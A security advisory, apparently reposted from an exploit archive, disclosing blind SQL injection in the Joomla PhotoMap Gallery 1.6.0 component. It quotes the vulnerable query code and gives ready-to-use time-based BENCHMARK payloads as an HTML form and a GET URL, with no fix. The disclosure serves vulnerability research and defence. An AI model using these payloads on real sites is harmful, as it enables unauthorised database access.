Joomla Component PhotoMap Gallery 1.6.0 Multiple Blind SQL Injection
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component PhotoMap Gallery 1.6.0 Multiple Blind SQL Injection</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================================
Joomla Component PhotoMap Gallery 1.6.0 Multiple Blind SQL Injection
====================================================================
PhotoMap Gallery 1.6.0 Joomla Component Multiple Blind SQL Injection
Name PhotoMap Gallery
Vendor http://extensions.joomla.org/extensions/photos-a-images/photo-gallery/10658
Versions Affected 1.6.0
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-07-28
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
I. ABOUT THE APPLICATION
________________________
PhotoMap Gallery is a gallery component completely
integrated into Joomla 1.5.x. Like ‘Picasa’, ‘Flickr’,
or ‘Panoramio’, you can easily add geo-tags to your
photos so that you can remember exactly where they’re
from using Google Maps.
II. DESCRIPTION
_______________
Some parameters are not properly sanitised before being
used in SQL queries.
III. ANALYSIS
_____________
Summary:
A) Multiple Blind SQL Injection
_______________________________
The parameter id passed to controller.php via POST when
view is set to user and task is set to save_usercategory
is not properly sanitised before being used in a SQL
query. This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.
The parameter folder passed to imagehandler.php is not
properly sanitised before used in a SQL query. This can
be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
The following is the affected code.
controller.php (line 1135):
function save_usercategory() {
// Check for request forgeries
JRequest::checkToken() or jexit( ‘Invalid Token’ );
$user = & JFactory::getUser();
$task = JRequest::getVar(‘task’);
$post = JRequest::get(‘post’);
//perform access checks
$isNew = ($post['id']) ? false : true;
// $catid = (int) JRequest::getVar(‘catid’, 0);
$db =& JFactory::getDBO();
$query = ‘SELECT c.id, c.directory’
. ‘ FROM #__g_categories AS c’
. ‘ WHERE c.id = ‘.$post['id'];
imagehandler.php (line 109);
function getList() {
static $list;
// Only process the list once per request
if (is_array($list)) {
return $list;
}
// Get folder from request
$folder = $this->getState(‘folder’);
$search = $this->getState(’search’);
$query = ‘SELECT *’
. ‘ FROM #__g_categories’
. ‘ WHERE id = ‘.$folder;
IV. SAMPLE CODE
_______________
A) Multiple Blind SQL Injection
Replace 89eb36eca1919aff534b13b54796c9a4 with your own.
<html>
<head>
<title>PoC – PhotoMap Gallery 1.6.0 Blind SQL Injection</title>
</head>
<body>
<form method="POST" action="http://127.0.0.1/joomla/index.php">
<input type="hidden" name="89eb36eca1919aff534b13b54796c9a4" value="1">
<input type="hidden" name="option" value="com_photomapgallery">
<input type="hidden" name="controller" value="">
<input type="hidden" name="view" value="user">
<input type="hidden" name="task" value="save_usercategory">
<input type="hidden" name="id" value="-1 AND (SELECT(IF(0×41=0×41, BENCHMARK(99999999999,NULL),NULL)))">
<input type="submit">
</form>
</body>
</html>
http://site/path/index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0×41=0×41,BENCHMARK(9999999999,NULL),NULL)))
V. FIX
______
No fix.
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-28]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13502
Leave a Reply